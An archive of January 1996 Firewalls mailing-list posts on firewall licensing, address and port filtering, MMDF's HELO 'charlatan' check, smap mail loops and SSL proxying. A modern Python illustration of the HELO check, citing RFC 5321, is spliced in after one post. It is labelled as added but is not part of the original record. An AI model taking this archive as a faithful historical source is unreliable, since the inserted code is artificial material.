Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id KAA00648; Tue, 9 Jan 1996 10:49:48 -0600 (CST)
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id KAA03813; Tue, 9 Jan 1996 10:49:49 -0600
Date: Tue, 9 Jan 1996 10:49:49 -0600
From: Rick Smith
Message-Id: <199601091649.KAA03813@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com, fubar@ranma.coc.powell-river.bc.ca
Subject: Re: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Fubar of Powell River, BC writes:

>We have been considering purchasing a firewall for our local ISP, and
>I've been reading this list trying to glean information on which setup
>would be best for us.
> One of the things we're looking for, and it's
>something I've not seen mentioned here, is the ability to outgoing
>traffic based on destination IP/PORT AND source IP.
> ... Is this fairly commonplace?

The technique isn't hard to implement, so it's probably pretty common. Sidewinder has it.
The only "gotcha" is that a long list of access permissions may eventually bog down the machine. Note that it only works as long as different classes of users (students, faculty) always use different IP addresses.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Tue Jan 9 10:29:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10093 for firewalls-outgoing; Tue, 9 Jan 1996 10:18:15 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10081 for ; Tue, 9 Jan 1996 10:18:11 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id KAA15402; Tue, 9 Jan 1996 10:15:26 -0800
Received: from unknown(206.0.206.200) by mycroft via smap (V1.3mjr) id sma015381; Tue Jan 9 10:14:49 1996
Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id KAA14356; Tue, 9 Jan 1996 10:13:32 -0800 (PST)
From: David Kovar
Message-Id: <199601091813.KAA14356@taz.nda.com>
Subject: Re: Fw License
To: jamessoh@tdb.gov.sg (James Soh)
Date: Tue, 9 Jan 1996 10:13:31 -0800 (PST)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <30F2AF7E@smtpgw.tdb.gov.sg> from "James Soh" at Jan 1, 80 05:44:00 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Is the Fw-license based on the number of internal IP addresses it protects?

FW-1 "Light" will protect a 50 node network. FW-1 "Mid" will do 250 hosts. FW-1 is unlimited.

> If our organisation has exceeded this IP protection, according to sources,
> it is unenforceable now, how will the FW behave?

It will complain loudly and fill up your log files while doing so if it detects more than the licensed number of hosts. Sure, you can get around this, but it goes against the license. If you've purchased more than 50 pieces of hardware, you can afford the incremental cost in the FW-1 to protect them.
Add $100 to the cost of each machine and you're there.

-David

From firewalls-owner Tue Jan 9 10:59:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10711 for firewalls-outgoing; Tue, 9 Jan 1996 10:57:20 -0800 (PST)
Received: from hub.impulse.net (hub.impulse.net [204.188.6.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10706 for ; Tue, 9 Jan 1996 10:57:17 -0800 (PST)
Received: from home.impulse.net.impulse.net (home.impulse.net [204.188.6.11]) by hub.impulse.net (8.6.12/8.6.12) with SMTP id KAA14288 for ; Tue, 9 Jan 1996 10:57:59 -0800
Date: Tue, 9 Jan 1996 10:57:59 -0800
Message-Id: <199601091857.KAA14288@hub.impulse.net>
X-Sender: lena@hub.impulse.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: lena@hub.impulse.net (Lena Alker)
Subject: weird e-mail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

TEST MESSAGE

a user on our system rec'd mail sent to this address, just trying to duplicate

/*********************************************************************
lena@impulse.net (Lena Alker, Impulse Engineering, Impulse Internet)
PCB Designer specializing in PCB layout, assembly, and manufacturing
*********************************************************************/

From firewalls-owner Tue Jan 9 11:55:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11330 for firewalls-outgoing; Tue, 9 Jan 1996 11:14:23 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11311 for ; Tue, 9 Jan 1996 11:14:18 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id LAA15845; Tue, 9 Jan 1996 11:11:33 -0800
Received: from su1.in.net(199.0.62.2) by mycroft via smap (V1.3mjr) id sma015839; Tue Jan 9 11:10:46 1996
Received: from pm2-03.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00580; Tue, 9 Jan 96 14:11:27 -0500
Date: Tue, 9 Jan 96 14:11:27 -0500
Message-Id: <9601091911.AA00580@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Attention Firewall Vendors (user->firewall encryption)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Attention firewall vendors,

If your firewall supports/uses user->firewall encryption, I would appreciate it if you would give me a call at (317) 573-0800 and send me some literature at the following address:

Fortified Networks Inc.
33 Harrowgate Drive
Carmel, IN 46033
USA

The info is necessary for an upcoming project. More details will be given to those who will respond. There is a potential sales opportunity to those who respond.

In the interests of saving my time and yours, please respond only if your firewall supports user->firewall encryption. (It is assumed that your product already supports firewall->firewall encryption).

Please feel free to e-mail me or call me at the number listed below.

Thanks in advance for your help.

Best Regards,

Frank

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.
From firewalls-owner Tue Jan 9 12:14:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12941 for firewalls-outgoing; Tue, 9 Jan 1996 11:32:39 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA12936 for ; Tue, 9 Jan 1996 11:32:34 -0800 (PST)
Received: from clark.net (clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id OAA02042; Tue, 9 Jan 1996 14:30:50 -0500 (EST)
Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id OAA17592; Tue, 9 Jan 1996 14:30:49 -0500 (EST)
Date: Tue, 9 Jan 1996 14:30:49 -0500 (EST)
From: "Paul D. Robertson"
To: Rick Smith
cc: firewalls@GreatCircle.COM
Subject: Re: Fw License
In-Reply-To: <199601091702.LAA04266@shade.sctc.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 9 Jan 1996, Rick Smith wrote:
>
> It probably depends on the vendor. Sidewinder is sold as a device, so
> the costs are related to the number of Sidewinders bought, not the
> traffic each one handles.
>
> Does anyone perceive a benefit to sites in charging according to the
> number of hosts protected? Is there some situation in which such
> charges might make sense?
>

I could *almost* see it for chargeback accounting internally within a company. Internally though I'd see the politics being easier for charging back based on proxy usage, number of IP devices, or some less specific metric which is a little more easily measurable.

I don't see how you would do it with reliability, unless you have a very small setup. Do SNA machines count as protected because there are machines inside the perimeter running IP and SNA? IPX? How many of us have much of an idea how many machines are connected at a given moment, given WAN links, dial-up, laptop users, etc? I have a few networks and network access points at my desk.
Only one device is on the production networks 99% of the time, how do you count the rest?

I know there is some merit to having the answers, I just can imagine how you'd (ok, not a really theoretical you, a very untheoretical me) keep a handle on it. Even putting a sniffer on each subnet for three days would take longer than you could keep current, and leave a fairly high margin of error. That margin of error would scare me away from a contract or licence, let alone WAN links, and departments with enough autonomy to merit their very own packet screens.

Also, if you have multiple devices compromising your firewall, is the bastion bearing the brunt of protecting the network? If you buy parts of your firewall strategy on a normal pricing model, and part on machines on the other side, it's going to throw off the dollars when one cost goes up over time, and the others decrease.

Small networks with chargeback accounting are the only place I could see this, and I'd envy the heck out of them :)

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Tue Jan 9 12:17:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12085 for firewalls-outgoing; Tue, 9 Jan 1996 11:25:31 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11853 for ; Tue, 9 Jan 1996 11:24:52 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id KAA15686; Tue, 9 Jan 1996 10:51:31 -0800
Received: from cfg.cfg.com(192.84.10.3) by mycroft via smap (V1.3mjr) id sma015682; Tue Jan 9 10:50:44 1996
Received: from p1.cfg.com (p1.cfg.com [192.84.10.11]) by cfg.cfg.com (8.6.11/CFG-950329) with SMTP id KAA07544; Tue, 9 Jan 1996 10:51:10 -0800
Message-Id: <2.2.16.19960109185111.4d7f2ab0@mail.cfg.com>
X-Sender: shc@mail.cfg.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 09 Jan 1996 10:51:11 -0800
To: "Jim Meritt"
From: Steve Caine
Subject: Re: charlatan
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 12:09 01/09/96 EST, you wrote:
> When email is received, some places apparently check a couple of
> things (from field and ...?) and if they do not match (?) print the
> error message "You are a charlatan" and do not accept the mail.
>
> What are they checking?

Such sites may be running MMDF's SMTP daemon. It reverses your IP number and makes sure it matches the name you give in the HELO command. If it doesn't, it returns "250 xxx - you are a charlatan" where xxx is the argument you gave in the HELO.

Steve.
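The check Steve describes, modelled so it can be run offline. This is an added illustration written for this archive, not code from the post or from MMDF: reverse DNS is replaced by a constructed PTR table, every host name and address in it is made up, and treating a mismatch as grounds to refuse the session (as in Jim Meritt's report) is the example's own assumption.

```python
# Added example, not code from the list post or from MMDF: a model of the
# HELO-vs-reverse-DNS check Steve Caine describes.  Reverse DNS is replaced
# by a constructed PTR table so the code runs offline; every host name and
# address below is made up for the example.
import ipaddress

# Constructed stand-in for reverse DNS (PTR records). Hypothetical data.
PTR_TABLE = {
    "192.0.2.10": "mail.example.net",
    "192.0.2.20": "gw.example.org",
    # 192.0.2.99 deliberately has no PTR record.
}

CHARLATAN = "you are a charlatan"


def reverse_lookup(peer_ip, ptr_table=PTR_TABLE):
    """Return the PTR name for the connecting address, or None if unpublished."""
    return ptr_table.get(str(ipaddress.ip_address(peer_ip)))


def classify_helo(peer_ip, helo_arg, ptr_table=PTR_TABLE):
    """Compare the HELO argument with what reverse DNS says about the peer.

    Returns one of:
      "ok"               - HELO name equals the peer's PTR name
      "literal-ok"       - HELO is an address literal naming the peer itself
      "literal-mismatch" - HELO is an address literal for some other address
      "no-ptr"           - the peer publishes no PTR record at all
      "mismatch"         - a PTR exists but names a different host
    """
    arg = helo_arg.strip().rstrip(".")
    # RFC 5321 allows an address literal such as [192.0.2.10] in HELO.
    if arg.startswith("[") and arg.endswith("]"):
        try:
            literal = ipaddress.ip_address(arg[1:-1])
        except ValueError:
            return "literal-mismatch"
        return "literal-ok" if literal == ipaddress.ip_address(peer_ip) else "literal-mismatch"
    name = reverse_lookup(peer_ip, ptr_table)
    if name is None:
        return "no-ptr"
    return "ok" if name.lower() == arg.lower() else "mismatch"


def helo_response(peer_ip, helo_arg, ptr_table=PTR_TABLE):
    """Build the reply line as Steve describes it, plus a refusal flag.

    The daemon in the post answers 250 either way and appends the
    "charlatan" text on a mismatch; whether the session is then refused
    (as Jim Meritt observed) is modelled here as the second return value.
    """
    verdict = classify_helo(peer_ip, helo_arg, ptr_table)
    if verdict in ("ok", "literal-ok"):
        return f"250 {helo_arg}", False
    return f"250 {helo_arg} - {CHARLATAN}", True


def audit_sessions(sessions, ptr_table=PTR_TABLE):
    """Run (peer_ip, helo) pairs through the check and return the verdicts.

    Useful on the sending side: it shows which of your own gateways would
    be branded a charlatan before a remote site tells you.
    """
    return {(ip, helo): classify_helo(ip, helo, ptr_table) for ip, helo in sessions}


if __name__ == "__main__":
    # Constructed sessions: one clean, one internal hostname leaking through a
    # gateway, one address literal, one host without a PTR record.
    sample = [
        ("192.0.2.10", "mail.example.net"),
        ("192.0.2.20", "pcdesk.corp.internal"),
        ("192.0.2.10", "[192.0.2.10]"),
        ("192.0.2.99", "mail.example.net"),
    ]
    for (ip, helo), verdict in audit_sessions(sample).items():
        line, refused = helo_response(ip, helo)
        print(f"{ip:>12} HELO {helo:<24} {verdict:<16} -> {line!r} refused={refused}")
```

Run as a script, it prints one verdict per constructed session. The practical reading for a site that keeps failing the check, as Jim's does, is that the name a gateway announces in HELO must be exactly what a reverse lookup of the connecting address returns; an internal desktop name leaking through a relay, or a missing PTR record, trips it just as a forged greeting would, which is why this check catches far more misconfiguration than forgery.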
From firewalls-owner Tue Jan 9 12:44:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12707 for firewalls-outgoing; Tue, 9 Jan 1996 11:27:53 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12302 for ; Tue, 9 Jan 1996 11:26:18 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id JAA15247; Tue, 9 Jan 1996 09:56:24 -0800
Received: from hnc.hnc.com(206.79.10.2) by mycroft via smap (V1.3mjr) id sma015243; Tue Jan 9 09:55:37 1996
Received: (from uucp@localhost) by hnc.hnc.com (8.7.1/8.7.1) id KAA07625 for ; Tue, 9 Jan 1996 10:11:30 -0800 (PST)
Received: from serval.hnc.com(206.79.54.2) by hnc.hnc.com via smap (V1.3) id sma007623; Tue Jan 9 10:11:24 1996
Received: from spike.hnc.com (spike.hnc.com [191.9.201.52]) by serval.hnc.com (8.7.1/8.7.1) with ESMTP id KAA01999 for ; Tue, 9 Jan 1996 10:01:29 -0800 (PST)
Received: from fred.hnc.com (fred.hnc.com [191.9.204.7]) by spike.hnc.com (8.7.1/8.7.1) with SMTP id JAA06719 for ; Tue, 9 Jan 1996 09:58:50 -0800 (PST)
Message-Id: <199601091758.JAA06719@spike.hnc.com>
Received: from pcdwl.hnc.com by fred.hnc.com with SMTP (1.38.193.4/16.2) id AA12765; Tue, 9 Jan 1996 10:03:10 -0800
X-Sender: dwl@spike
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 09 Jan 1996 17:58:18 -0800
To: firewalls@greatcircle.com
From: David Loysen
Subject: Re: Off-Topic: Selling Firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:57 AM 1/9/96 -0500, you wrote:
>>
>>
>>> Please don't flame me for this (possibly) off-topic question, but I
>>> think, the best answer for my question is with the members of this great
>list.
>>>
>
>Wouldn't think of it.
>
>
>>> I started working for a VAR of firewalls and other network related
>>> products. When it comes to writing proposals, I feel there must be
>>> tools to effectively support the selling process
>>>

Stuff Chopped----

Also you can try pinging on your vendors. I think 3Com, Cisco and Bay all have proposal writing software available for their resellers.

dwl@hnc.com                     HNC Software Inc.
David Loysen                    5930 Cornerstone Ct. West
(619) 546-8877 x245             San Diego, CA 92121-3728
fax (619) 452-6524

From firewalls-owner Tue Jan 9 12:59:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12750 for firewalls-outgoing; Tue, 9 Jan 1996 11:28:04 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12392 for ; Tue, 9 Jan 1996 11:26:38 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id JAA15238; Tue, 9 Jan 1996 09:55:24 -0800
Received: from su1.in.net(199.0.62.2) by mycroft via smap (V1.3mjr) id sma015233; Tue Jan 9 09:55:08 1996
Received: from pm4-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA27180; Tue, 9 Jan 96 12:55:45 -0500
Date: Tue, 9 Jan 96 12:55:45 -0500
Message-Id: <9601091755.AA27180@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: Fw License
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From the desk of Rick Smith:
>James Soh asks:
>
>>Is the Fw-license based on the number of internal IP addresses it protects?
>
>It probably depends on the vendor. Sidewinder is sold as a device, so
>the costs are related to the number of Sidewinders bought, not the
>traffic each one handles.
>
>Does anyone perceive a benefit to sites in charging according to the
>number of hosts protected? Is there some situation in which such
>charges might make sense?
>
>Rick.
>smith@sctc.com secure computing corporation Some vendors do this as a means to undercut their competitors. They are using the firewall product as a type of software license and use it to scale the price of the firewall (making it dependent on the number of hosts/users it is to support). It is particularly useful in small companies which only have a handful of systems to protect and don't expect any growth anytime soon and/or have very limited budgets. In spite of this, I personally am not in favor of this type of approach. Sudden growth (mergers, acquisitions, etc) could impact the licensing of the firewall & either get the customer in hot water with SPA or the vendor or face a denial-of-service for those extra connections until the customer remembers to get an upgraded license. This could be rather interesting if the person who ordered the firewall or was familiar with the licensing scheme wasn't around when the number of connections exceeded the license & no one else had a clue what was going on. 8^( Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. 
From firewalls-owner Tue Jan 9 13:44:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15802 for firewalls-outgoing; Tue, 9 Jan 1996 13:23:48 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15642 for ; Tue, 9 Jan 1996 13:23:21 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id NAA17382; Tue, 9 Jan 1996 13:19:03 -0800
Received: from callisto.eci-esyst.com(199.186.17.2) by mycroft via smap (V1.3mjr) id sma017372; Tue Jan 9 13:18:04 1996
Received: by eci-esyst.com (4.1/SMI-4.1) id AA11587; Tue, 9 Jan 96 16:14:29 EST
Received: from rodney.eci-esyst.com(199.186.17.5) by callisto.eci-esyst.com via smap (V1.3mjr) id sma011558; Tue Jan 9 16:13:36 1996
Received: from qmgate (qmgate.eci-esyst.com) by callisto (4.1/SMI-4.1) id AA02343; Tue, 9 Jan 96 16:14:59 EST
Message-Id:
Date: 9 Jan 1996 16:12:06 -0500
From: "Tim Darnauer"
Subject: smap/smapd question
To: "firewalls*GreatCircle.COM"
X-Mailer: Mail*Link SMTP-QM 3.0.2
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"; Name="Message Body"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

smap/smapd question via Mail*Link® for PowerTalk*/QM

The problem is that mail destined for the Internet is queued by sendmail if the destination host is down. Mail destined for a host on the inside (protected) network is not queued by sendmail if the internal mail host is down. Instead I get a "mail loop" and the message is returned to the sender after 30 hops.

Does anyone know how or why smap, smapd, and sendmail are doing this? Obviously I have a problem with my configuration but I've run out of ideas.
Thanks, Tim From firewalls-owner Tue Jan 9 13:59:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15804 for firewalls-outgoing; Tue, 9 Jan 1996 13:23:49 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15646 for ; Tue, 9 Jan 1996 13:23:22 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id MAA16933; Tue, 9 Jan 1996 12:41:54 -0800 Received: from bwh.harvard.edu(134.174.81.34) by mycroft via smap (V1.3mjr) id sma016899; Tue Jan 9 12:40:57 1996 Received: from mingus.harvard.edu (mingus.bwh.harvard.edu [134.174.81.51]) by bwh.harvard.edu (8.6.9/8.6.9) with SMTP id PAA18821; Tue, 9 Jan 1996 15:41:35 -0500 From: Adam Shostack Message-Id: <199601092041.PAA18821@bwh.harvard.edu> X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Subject: Re: Fw License To: smith@sctc.com (Rick Smith) Date: Tue, 9 Jan 1996 15:41:12 -0500 (EST) Cc: firewalls@greatcircle.com (Firewalls mailing list) In-Reply-To: <199601091702.LAA04266@shade.sctc.com> from "Rick Smith" at Jan 9, 96 11:02:05 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith wrote: | It probably depends on the vendor. Sidewinder is sold as a device, so | the costs are related to the number of Sidewinders bought, not the | traffic each one handles. | | Does anyone perceive a benefit to sites in charging according to the | number of hosts protected? Is there some situation in which such | charges might make sense? If your firewall is available on a software only basis, then it might make sense to have a different fee for smaller customers. 
If a company with 15 computers has an old 486 around that they want to use to handle their fractional T1, and your software can use that, then it might be a cost-effective way to go. There are lots of companies out there who don't want to spend $1000/computer to protect themselves, which is what some firewalls can cost over a small set of hosts. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Jan 9 18:01:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA23497 for firewalls-outgoing; Tue, 9 Jan 1996 17:50:59 -0800 (PST) Received: from cbn.cbn.com.sg ([203.120.18.128]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA23492 for ; Tue, 9 Jan 1996 17:50:54 -0800 (PST) Received: (from ngps@localhost) by cbn.cbn.com.sg (8.6.12/8.6.12) id JAA05351; Wed, 10 Jan 1996 09:44:09 +0800 Date: Wed, 10 Jan 1996 09:44:08 +0800 (SST) From: Ng Pheng Siong To: Rick Smith cc: firewalls@GreatCircle.COM, fubar@ranma.coc.powell-river.bc.ca Subject: Re: IP/Port Filtering. (Was Re: SSL and S-HTTP Proxy support) In-Reply-To: <199601091649.KAA03813@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jan 1996, Rick Smith wrote: > Fubar of Powell River, BC writes: > > One of the things we're looking for, and it's > >something I've not seen mentioned here, is the ability to outgoing > >traffic based on destination IP/PORT AND source IP. > > The technique isn't hard to implement, so it's probably pretty common. > Sidewinder has it. The only "gotcha" is that a long list of access > permissions may eventually bog down the machine. So how long is long, for Sidewinder, say? Cheers. - PS -- Ng Pheng Siong NetCentre Pte Ltd * Singapore Finger for PGP key. 
From firewalls-owner Tue Jan 9 19:07:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA23784 for firewalls-outgoing; Tue, 9 Jan 1996 18:05:21 -0800 (PST) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA23779 for ; Tue, 9 Jan 1996 18:05:16 -0800 (PST) Received: from [38.11.94.121] by smtp2.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) id VAA01342; Tue, 9 Jan 1996 21:04:23 -0500 X-Sender: cd000674@pop3.interramp.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 9 Jan 1996 22:58:01 +0900 To: firewalls@GreatCircle.COM From: dolphin@interramp.com (Tidewater Cyberfish) Subject: Re: Fw License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Some vendors do this as a means to undercut their competitors. And some do it to better manage the growth of such elements as new product development, and the product customer support requirements of different sized organizations. >They are using the firewall product as a type of software license >and use it to scale the price of the firewall (making it dependent >on the number of hosts/users it is to support). It is particularly >useful in small companies which only have a handful of systems to >protect and don't expect any growth anytime soon and/or have very >limited budgets. Unless you sell a "one-size-fits-all" product" to a "one-size-only- needed-by-all" market, it's the only prudent way to do it. >In spite of this, I personally am not in favor of this type of >approach. >Sudden growth (mergers, acquisitions, etc) could impact the >licensing of >the firewall & either get the customer in hot water with >SPA or the >vendor or face a denial-of-service for those extra >connections until the >customer remembers to get an upgraded license. Yeah, in some organizations that are asleep at the wheel. But for the most part it just doesn't happens that way. 
First off mergers, acquisitions and other "sudden growth" occurances just do not have this kind of impact on corporate enterprise security. I have been involved in better than a dozen such "sudden growths" and these issues are part of the reason why it usually takes three to eighteen months to get through the "sign-off" on a merged or absorbed entity. To those involved in these exercises, security is at or very near the top of that list. Additionally, if a customer has purchased a decent firewall from a reputable vendor who offers a scalable product, who is paying attention to the post-sale needs, and downstream growth needs of his customer then there's little reason for handwringing. Most of the "it fell through the cracks" or "denial of service" problems I've encountered are due to someone just not paying attention to the issues that justify their paychecks. >This could be rather interesting if the person who ordered the firewall >>or was familiar with the licensing scheme wasn't around when the number >>of connections exceeded the license & no one else had a clue what was >>going on. At which time I would be strongly inclined to ask my CIO/DIRIRM for an explanation... 
rmck __________________________________________________ Bob McKisson Cypress Systems Corporation McLean, VA 22102 (703) 273-2150 Voice (703) 273-2151 FAX (703) 691-2434 STU-III pelican@interramp.com National Capital Region dolphin@interramp.com Norfolk/Chesapeake/VA Beach From firewalls-owner Tue Jan 9 20:22:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA02690 for firewalls-outgoing; Tue, 9 Jan 1996 20:14:16 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA02682 for ; Tue, 9 Jan 1996 20:14:11 -0800 (PST) Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id XAA01788; Tue, 9 Jan 1996 23:12:59 -0500 Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id UAA26544; Tue, 9 Jan 1996 20:13:00 -0800 Message-ID: Date: 6 Jan 1996 01:41:06 -0800 From: "PDXML2" Subject: PLEASE RE-SEND, E-MAIL ADMI To: "firewalls-digest@GreatCircle.CO" X-Mailer: Mail*Link SMTP/QM 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail*Link(r) SMTP Firewalls-Digest V5 #8 Received: by pdxml2.mentorg.com with SMTP;6 Jan 1996 01:35:41 -0800 Received: from relay7.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id EAA22326; Sat, 6 Jan 1996 04:30:18 -0500 Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQzxib26519; Sat, 6 Jan 1996 04:29:17 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA17120 for firewalls-digest-outgoing; Sat, 6 Jan 1996 01:00:14 -0800 (PST) Date: Sat, 6 Jan 1996 01:00:14 -0800 (PST) Message-Id: <199601060900.BAA17120@miles.greatcircle.com> From: firewalls-digest-owner@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #8 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@uunet.uu.net Precedence: bulk Firewalls-Digest Saturday, 6 January 1996 Volume 05 : Number 008 In 
this issue: SSL and S-HTTP Proxy support Re: Security managing Cisco Routers Re: SSL and S-HTTP Proxy support Steps in building a firewall, Right or Wrong? See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: cbk@ingress.com (Charles B. Kaplan) Date: Fri, 5 Jan 1996 23:21:13 -0500 Subject: SSL and S-HTTP Proxy support >From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefor any proxy supporting HTTP should work with S-HTTP. Next, while SSL COULD be implimented accross multiple protocols, etc, the 'only' wide spread use presentally is via netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI out of the box proxys port 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things. NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That ofcourse is why BorderWare provides a 3'rd network interface for 'secured servers'. Well, enough plugging of BorderWare....if you didn't guess I resell it. Anyone care to either veryify or correct the above S-HTTP notes ? - -Charles Kaplan for more information on BorderWare call 800-254-7159 ------------------------------ From: Bill Husler 